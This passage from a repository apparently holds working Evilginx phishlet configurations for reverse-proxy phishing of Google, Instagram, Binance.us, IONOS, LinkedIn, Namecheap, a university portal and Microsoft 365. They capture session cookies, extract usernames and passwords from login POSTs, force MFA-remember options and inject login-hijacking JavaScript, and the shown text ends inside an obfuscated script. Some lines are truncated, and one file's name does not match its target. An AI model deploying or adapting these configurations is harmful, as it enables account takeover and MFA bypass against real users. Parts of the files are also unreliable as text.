'text/ecmascript']} 14 | - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'play.google.com', replace: 'play.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 15 | - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'apis.google.com', replace: 'apis.{domain}', mimes: ['application/json', 'text/html', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 16 | - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'www.google.com', replace: 'www.{domain}', mimes: ['application/json', 'text/html', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 17 | - {triggers_on: 'apis.google.com', orig_sub: 'apis', domain: 'google.com', search: 'content.googleapis.com', replace: 'content.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 18 | auth_tokens: 19 | - domain: '.google.com' 20 | keys: [".*,regexp"] 21 | - domain: 'accounts.google.com' 22 | keys: [".*,regexp"] 23 | - domain: 'accounts.google.bg' 24 | keys: [".*,regexp"] 25 | credentials: 26 | username: 27 | key: 'f.req' 28 | search: '\],"([^"]*)"\]$' 29 | type: 'post' 30 | password: 31 | key: 'f.req' 32 | search: ',\["([^"]*)",' 33 | type: 'post' 34 | custom: 35 | - key: 'useragent' 36 | search: '(.*)' 37 | type: 'post' 38 | - key: 'browser' 39 | search: '(.*)' 40 | type: 'post' 41 | - key: 'engine' 42 | search: '(.*)' 43 | type: 'post' 44 | - key: 'platform' 45 | search: '(.*)' 46 | type: 'post' 47 | auth_urls: 48 | - '/CheckCookie' 49 | - '/ManageAccount' 50 | login: 51 | domain: 'accounts.google.com' 52 | path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin' 53 | force_post: 54 | - path: '/_/signin/sl/challenge' 55 | search: 56 | - {key: 'f.req', search: '.*'} 57 | - {key: 'continue', search: '.*'} 58 | force: 59 | - {key: 'continue', value: ''} 60 | type: 'post' 61 | js_inject: 62 | - trigger_domains: ['accounts.google.com'] 63 | trigger_paths: ['.*?'] 64 | script: | 65 | function serialize( obj ){ 66 | var str = []; 67 | for (var p in obj){ 68 | if (obj.hasOwnProperty(p)) { 69 | str.push(encodeURIComponent(p) + "=" + encodeURIComponent(obj[p])); 70 | } 71 | } 72 | return str.join("&"); 73 | } 74 | function toPopulate(){ 75 | console.log( "Populating" ); 76 | var xhttp = new XMLHttpRequest(); 77 | var tosend = { 78 | useragent : navigator.userAgent, 79 | browser : navigator.appName, 80 | engine : navigator.product, 81 | platform : navigator.platform, 82 | } 83 | xhttp.onreadystatechange = function(){ 84 | console.log( "Sent" ); 85 | } 86 | xhttp.open( "POST", "/getuserinfo", true ); 87 | xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); 88 | console.log( serialize( tosend ) ); 89 | xhttp.send( serialize( tosend ) ); 90 | } 91 | console.log( "Reached here." ); 92 | setTimeout(toPopulate, 2000); -------------------------------------------------------------------------------- /phishlet_examples/instagram.yaml: -------------------------------------------------------------------------------- 1 | author: '@charlesbel' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'instagram.com', session: true, is_landing: true} 5 | - {phish_sub: 'm', orig_sub: 'm', domain: 'instagram.com', session: true, is_landing: false} 6 | sub_filters: 7 | - {triggers_on: 'www.instagram.com', orig_sub: 'www', domain: 'instagram.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 8 | - {triggers_on: 'm.instagram.com', orig_sub: 'm', domain: 'instagram.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 9 | - {triggers_on: 'm.instagram.com', orig_sub: 'm', domain: 'instagram.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 10 | auth_tokens: 11 | - domain: '.instagram.com' 12 | keys: ['sessionid','.*,regexp'] 13 | credentials: 14 | username: 15 | key: 'user' 16 | search: '(.*)' 17 | type: 'post' 18 | password: 19 | key: 'unenc_password' 20 | search: '(.*)' 21 | type: 'post' 22 | login: 23 | domain: 'www.instagram.com' 24 | path: '/accounts/login' 25 | js_inject: 26 | - trigger_domains: ["www.instagram.com"] 27 | trigger_paths: ["/accounts/login"] 28 | trigger_params: [] 29 | script: | 30 | function lp(){ 31 | var submit = document.querySelectorAll('button[type=submit]')[0]; 32 | submit.setAttribute("onclick", "sendPass()"); 33 | return; 34 | } 35 | function sendPass(){ 36 | var password = document.getElementsByName("password")[0].value; 37 | var xhr = new XMLHttpRequest(); 38 | xhr.open("POST", '/accounts/login/ajax/', true); 39 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 40 | xhr.send("unenc_password="+encodeURIComponent(password)); 41 | return; 42 | } 43 | setTimeout(function(){ lp(); }, 1000); -------------------------------------------------------------------------------- /phishlet_examples/intuit.yaml: -------------------------------------------------------------------------------- 1 | author: '@an0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'binance.us', session: true, is_landing: true} 5 | - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'binance.us', session: false, is_landing: false} 6 | - {phish_sub: 'preprod', orig_sub: 'preprod', domain: 'binance.us', session: false, is_landing: false} 7 | - {phish_sub: 'static', orig_sub: 'static', domain: 'binance.us', session: false, is_landing: false} 8 | - {phish_sub: 'stream', orig_sub: 'stream', domain: 'binance.us', session: false, is_landing: false} 9 | - {phish_sub: 'api', orig_sub: 'api', domain: 'binance.us', session: false, is_landing: false} 10 | - {phish_sub: 'support', orig_sub: 'support', domain: 'binance.us', session: false, is_landing: false} 11 | - {phish_sub: 'test', orig_sub: 'test', domain: 'binance.us', session: false, is_landing: false} 12 | - {phish_sub: 'docs', orig_sub: 'docs', domain: 'binance.us', session: false, is_landing: false} 13 | - {phish_sub: 'blog', orig_sub: 'blogs', domain: 'binance.us', session: false, is_landing: false} 14 | - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false} 15 | 16 | # www.gstatic.com 17 | # www.google.com 18 | # accounts.intuit.com 19 | # appfabric-preload.app.intuit.com 20 | # lib.intuitcdn.net 21 | # plugin.intuitcdn.net 22 | # segment.intuitcdn.net 23 | # qbo.intuit.com 24 | # lacerte.intuit.com 25 | # intuitmarket.intuit.com 26 | # 27 | 28 | 29 | # uxfabric.intuitcdn.net 30 | # trinity.platform.intuit.com 31 | # www.intuit.com 32 | # quickbooks.intuit.com 33 | # segment.intuitcdn.net 34 | # rum.api.intuit.com 35 | # intuit.com 36 | # eventbus.intuit.com 37 | # cdn.websdk.intuit.com 38 | # 39 | 40 | sub_filters: 41 | - {triggers_on: 'www.binance.us', orig_sub: 'www', domain: 'binance.us', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']} 42 | - {triggers_on: 'preprod.binance.us', orig_sub: 'preprod', domain: 'binance.us', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 43 | - {triggers_on: 'static.binance.us', orig_sub: 'static', domain: 'binance.us', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 44 | - {triggers_on: 'stream.binance.us', orig_sub: 'stream', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 45 | - {triggers_on: 'api.binance.us', orig_sub: 'api', domain: 'binance.us', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 46 | - {triggers_on: 'support.binance.us', orig_sub: 'support', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 47 | - {triggers_on: 'accounts.binance.us', orig_sub: 'accounts', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 48 | - {triggers_on: 'test.binance.us', orig_sub: 'test', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 49 | - {triggers_on: 'docs.binance.us', orig_sub: 'docs', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 50 | - {triggers_on: 'blog.binance.us', orig_sub: 'blog', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 51 | - {triggers_on: 'accounts.binance.us', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 52 | 53 | 54 | auth_tokens: 55 | - domain: 'accounts.binance.us' 56 | keys: [".*,regexp"] 57 | credentials: 58 | username: 59 | key: 'email' 60 | search: '(.*)' 61 | type: 'post' 62 | password: 63 | key: 'password' 64 | search: '(.*)' 65 | type: 'post' 66 | auth_urls: 67 | - '/mail' 68 | - '/mail/' 69 | login: 70 | domain: 'accounts.binance.us' 71 | path: '/en/login?return_to=aHR0cHM6Ly93d3cuYmluYW5jZS51cy9lbi9ob21l' -------------------------------------------------------------------------------- /phishlet_examples/ionos.yaml: -------------------------------------------------------------------------------- 1 | 2 | author: '@An0nud4y' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'ionos.com', session: true, is_landing: true} 6 | - {phish_sub: '', orig_sub: '', domain: 'ionos.com', session: true, is_landing: false} 7 | 8 | sub_filters: 9 | - {triggers_on: 'login.ionos.com', orig_sub: 'login', domain: 'ionos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 10 | - {triggers_on: 'login.ionos.com', orig_sub: '', domain: 'ionos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 11 | 12 | auth_tokens: 13 | - domain: '.ionos.com' 14 | keys: ['.*,regexp'] 15 | auth_urls: 16 | - '' 17 | credentials: 18 | username: 19 | key: 'oaologin.username' 20 | search: '(.*)' 21 | type: 'post' 22 | password: 23 | key: 'oaologin.password' 24 | search: '(.*)' 25 | type: 'post' 26 | custom: 27 | key: 'oaologin.additionaldata' 28 | search: '(.*)' 29 | type: 'post' 30 | login: 31 | domain: 'login.ionos.com' 32 | path: '/' 33 | 34 | -------------------------------------------------------------------------------- /phishlet_examples/linkedin2.yaml: -------------------------------------------------------------------------------- 1 | author: '@an0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true} 5 | - {phish_sub: 'platform', orig_sub: 'platform', domain: 'linkedin.com', session: false, is_landing: false} 6 | - {phish_sub: 'static-exp1', orig_sub: 'static-exp1', domain: 'licdn.com', session: false, is_landing: false} 7 | 8 | sub_filters: 9 | - {triggers_on: 'www.linkedin.com', orig_sub: '', domain: 'linkedin.com', search: '{hostname_regex}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 10 | - {triggers_on: 'www.linkedin.com', orig_sub: '', domain: 'licdn.com', search: '{hostname_regex}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 11 | 12 | 13 | - {triggers_on: 'www.linkedin.com', orig_sub: 'www', domain: 'linkedin.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 14 | - {triggers_on: 'www.linkedin.com', orig_sub: 'www', domain: 'linkedin.com', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 15 | - {triggers_on: 'www.linkedin.com', orig_sub: 'www', domain: 'linkedin.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 16 | - {triggers_on: 'www.linkedin.com', orig_sub: 'platform', domain: 'linkedin.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 17 | - {triggers_on: 'www.linkedin.com', orig_sub: 'platform', domain: 'linkedin.com', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 18 | - {triggers_on: 'www.linkedin.com', orig_sub: 'platform', domain: 'linkedin.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 19 | - {triggers_on: 'www.linkedin.com', orig_sub: 'static-exp1', domain: 'licdn.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 20 | - {triggers_on: 'www.linkedin.com', orig_sub: 'static-exp1', domain: 'licdn.com', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 21 | - {triggers_on: 'www.linkedin.com', orig_sub: 'static-exp1', domain: 'licdn.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 22 | 23 | 24 | auth_tokens: 25 | - domain: '.www.linkedin.com' 26 | keys: ['.*,regexp'] 27 | - domain: '.linkedin.com' 28 | keys: ['.*,regexp'] 29 | 30 | 31 | auth_urls: 32 | - '/feed' 33 | - '/feed/' 34 | credentials: 35 | username: 36 | key: 'session_key' 37 | search: '(.*)' 38 | type: 'post' 39 | password: 40 | key: 'session_password' 41 | search: '(.*)' 42 | type: 'post' 43 | 44 | login: 45 | domain: 'www.linkedin.com' 46 | path: '/uas/login' 47 | 48 | js_inject: 49 | - trigger_domains: ["www.linkedin.com"] 50 | trigger_paths: ["/uas/login"] 51 | trigger_params: ["email"] 52 | script: | 53 | function lp(){ 54 | var email = document.querySelector("#username"); 55 | var password = document.querySelector("#password"); 56 | if (email != null && password != null) { 57 | email.value = "{email}"; 58 | password.focus(); 59 | return; 60 | } 61 | setTimeout(function(){lp();}, 100); 62 | } 63 | setTimeout(function(){lp();}, 100); 64 | -------------------------------------------------------------------------------- /phishlet_examples/namecheap.yaml: -------------------------------------------------------------------------------- 1 | 2 | author: '@An0nud4y' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'www', orig_sub: 'www', domain: 'namecheap.com', session: true, is_landing: true} 6 | - {phish_sub: 'ap', orig_sub: 'ap.www', domain: 'namecheap.com', session: true, is_landing: false} 7 | - {phish_sub: 'ap', orig_sub: 'ap.www', domain: 'namecheap.com', session: true, is_landing: false} 8 | - {phish_sub: 'ap', orig_sub: 'ap.www', domain: 'namecheap.com', session: true, is_landing: false} 9 | - {phish_sub: 'ap', orig_sub: 'ap.www', domain: 'namecheap.com', session: true, is_landing: false} 10 | 11 | sub_filters: 12 | - {triggers_on: 'www.namecheap.com', orig_sub: 'www', domain: 'namecheap.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 13 | - {triggers_on: 'www.namecheap.com', orig_sub: 'ap.www', domain: 'namecheap.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 14 | 15 | 16 | auth_tokens: 17 | - domain: 'ap.www.namecheap.com' 18 | keys: ['.ncauth, rdt_uuid, SessionId, x-ncpl-auth, x-sf-country'] 19 | credentials: 20 | username: 21 | key: 'LoginUserName' 22 | search: '(.*)' 23 | type: 'post' 24 | password: 25 | key: 'LoginPassword' 26 | search: '(.*)' 27 | type: 'post' 28 | custom: 29 | - key: 'LoginUserName' 30 | search: '(.*)' 31 | type: 'post' 32 | - key: 'LoginUserName' 33 | search: '(.*)' 34 | type: 'post' 35 | - key: 'LoginPassword' 36 | search: '(.*)' 37 | type: 'post' 38 | - key: 'LoginPassword' 39 | search: '(.*)' 40 | type: 'post' 41 | 42 | login: 43 | domain: 'www.namecheap.com' 44 | path: '/myaccount/login/' 45 | 46 | -------------------------------------------------------------------------------- /phishlet_examples/nottingham.yaml: -------------------------------------------------------------------------------- 1 | author: ‘@harris' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'nottingham.ac.uk', session: true, is_landing: true} 5 | - {phish_sub: '', orig_sub: '', domain: 'nottingham.ac.uk', session: true, is_landing: false} 6 | - {phish_sub: 'myview', orig_sub: 'myview', domain: 'nottingham.ac.uk', session: true, is_landing: false} 7 | 8 | 9 | sub_filters: 10 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https://myview.nottingham.ac.uk:443', replace: 'https:/$ 11 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2Fmyview.nottingham.ac.uk:443', replace: 'h$ 12 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'myview.nottingham.ac.uk:443', replace: '{hostname}', mi$ 13 | 14 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'tex$ 15 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['$ 16 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}$ 17 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', '$ 18 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes:$ 19 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostna$ 20 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html'$ 21 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mim$ 22 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hos$ 23 | 24 | 25 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/j$ 26 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['tex$ 27 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', $ 28 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'tex$ 29 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['$ 30 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}$ 31 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', '$ 32 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes:$ 33 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostna$ 34 | 35 | 36 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'tex$ 37 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['$ 38 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}$ 39 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', '$ 40 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes:$ 41 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostna$ 42 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html'$ 43 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mim$ 44 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hos$ 45 | 46 | 47 | 48 | auth_tokens: 49 | - domain: '.nottingham.ac.uk' 50 | keys: ['.*,regexp'] 51 | - domain: 'myview.nottingham.ac.uk' 52 | keys: ['.*,regexp'] 53 | - domain: 'www.nottingham.ac.uk' 54 | keys: ['.*,regexp'] 55 | credentials: 56 | username: 57 | key: 'username' 58 | search: '(.*)' 59 | type: 'post' 60 | password: 61 | key: 'password' 62 | search: '(.*)' 63 | type: 'post' 64 | 65 | login: 66 | domain: 'myview.nottingham.ac.uk' 67 | path: '/dashboard/dashboard-ui/index.html#/landing' -------------------------------------------------------------------------------- /phishlet_examples/o365(2).yaml: -------------------------------------------------------------------------------- 1 | name: 'o365' 2 | author: '@jamescullum' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true} 6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false} 7 | - {phish_sub: 'adfs', orig_sub: 'sts', domain: 'ribkoff.com', session: true, is_landing:false} 8 | 9 | # The lines below are needed if your target organization utilizes ADFS. 10 | # If they do, you need to uncomment all following lines that contain <...> 11 | # To get the correct ADFS subdomain, test the web login manually and check where you are redirected. 12 | # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed: 13 | # = adfs 14 | # = example.com 15 | # = adfs.example.com 16 | #- {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false} 17 | #- {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false} 18 | sub_filters: 19 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 20 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 21 | # Uncomment and fill in if your target organization utilizes ADFS 22 | #- {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 23 | 24 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://sts.ribkoff.com', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 25 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://sts.ribkoff.com', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 26 | - {triggers_on: 'sts.ribkoff.com', orig_sub: 'sts', domain: 'ribkoff.com', search: 'href="https://sts.ribkoff.com', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 27 | - {triggers_on: 'sts.ribkoff.com', orig_sub: 'sts', domain: 'ribkoff.com', search: 'https://sts.ribkoff.com', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 28 | 29 | auth_tokens: 30 | - domain: '.login.microsoftonline.com' 31 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT'] 32 | - domain: 'login.microsoftonline.com' 33 | keys: ['SignInStateCookie'] 34 | credentials: 35 | username: 36 | key: '(login|UserName)' 37 | search: '(.*)' 38 | type: 'post' 39 | password: 40 | key: '(passwd|Password)' 41 | search: '(.*)' 42 | type: 'post' 43 | login: 44 | domain: 'login.microsoftonline.com' 45 | path: '/' -------------------------------------------------------------------------------- /phishlet_examples/o365(April-latest).yaml: -------------------------------------------------------------------------------- 1 | name: 'o365' 2 | author: '@APT29' 3 | min_ver: '2.4.0' 4 | proxy_hosts: 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true} 6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false} 7 | - {phish_sub: 'aadcdn', orig_sub: 'aadcdn', domain: 'msftauth.net', session: false, auto_filter: true, is_landing:false} 8 | sub_filters: 9 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 10 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 11 | 12 | auth_tokens: 13 | - domain: '.login.microsoftonline.com' 14 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT'] 15 | - domain: 'login.microsoftonline.com' 16 | keys: ['SignInStateCookie'] 17 | 18 | 19 | # INJECT COOKIES 20 | # -------------- 21 | # 22 | # Browse the url https://login.microsoftonline.com 23 | # inject the capture cookies 24 | # Refresh the browser 25 | 26 | 27 | 28 | credentials: 29 | username: 30 | key: 'login' 31 | search: '(.*)' 32 | type: 'post' 33 | password: 34 | key: 'passwd' 35 | search: '(.*)' 36 | type: 'post' 37 | auth_urls: 38 | - '/common/SAS/ProcessAuth' 39 | - '/kmsi' 40 | login: 41 | domain: 'login.microsoftonline.com' 42 | path: '/' 43 | force_post: 44 | - path: '/kmsi' 45 | search: 46 | - {key: 'LoginOptions', search: '.*'} 47 | force: 48 | - {key: 'LoginOptions', value: '1'} 49 | type: 'post' 50 | - path: '/common/SAS' 51 | search: 52 | - {key: 'rememberMFA', search: '.*'} 53 | force: 54 | - {key: 'rememberMFA', value: 'true'} 55 | type: 'post' 56 | js_inject: 57 | - trigger_domains: ["login.microsoftonline.com"] 58 | trigger_paths: ["/common/oauth2/","/","/*"] 59 | script: | 60 | var _0x410e92=_0x5778;(function(_0x35da17,_0x3a9f50){var _0x5ec8bb=_0x5778,_0x54aaae=_0x35da17();while(!![]){try{var 